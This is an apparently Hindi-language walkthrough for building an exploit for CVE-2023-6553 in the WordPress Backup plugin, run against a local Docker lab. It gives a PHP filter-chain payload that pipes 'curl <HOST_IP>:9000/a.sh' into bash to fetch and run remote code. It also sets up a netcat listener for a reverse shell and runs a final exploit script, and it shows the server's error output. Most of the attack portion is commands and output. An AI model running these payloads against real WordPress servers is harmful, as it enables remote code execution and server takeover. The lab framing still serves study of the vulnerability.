
CVE-2023-6553 के लिए Wordpress में बैकअप प्लगइन पर एक्सप्लॉइट विकास
Wordpress में Backup Plugin के लिए CVE-2023-6553 का Exploit Development
यह एक गंभीर CVE है जिसका CVSS स्कोर 9.8 है।
यह भेद्यता हमलावर को प्लगइन के असुरक्षित संस्करण को चला रहे सर्वर पर कमांड भेजने की अनुमति देती है।
असुरक्षित संस्करण Backup <= 1.3.7
रिपॉजिटरी को git clone करें
डॉकर कंटेनर सेट करने के लिए नीचे दिया गया कमांड चलाएँ
docker-compose up -d
आपको 2 डॉकर कंटेनर दिखने चाहिए
http://localhost:8000/
wget https://downloads.wordpress.org/plugin/backup-backup.1.3.6.zip
python3 -m http.server
go run exploit.go -chain="<?php exec('curl <HOST_IP>:9000/a.sh |bash');?>"
HTTP Response Body: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Size of a request header field exceeds server limit.</p>
<hr>
<address>Apache/2.4.62 (Debian) Server at 172.18.0.3 Port 80</address>
</body></html>
ऐसा इसलिए है क्योंकि फ़िल्टर रूपांतरणों के बाद हेडर का आकार सर्वर की अनुमत सीमा से अधिक हो जाता है।
nc -nlvp 8080
और अब असुरक्षित प्लगइन का शोषण करने के लिए कमांड चलाएँ
python3 final_exploit.py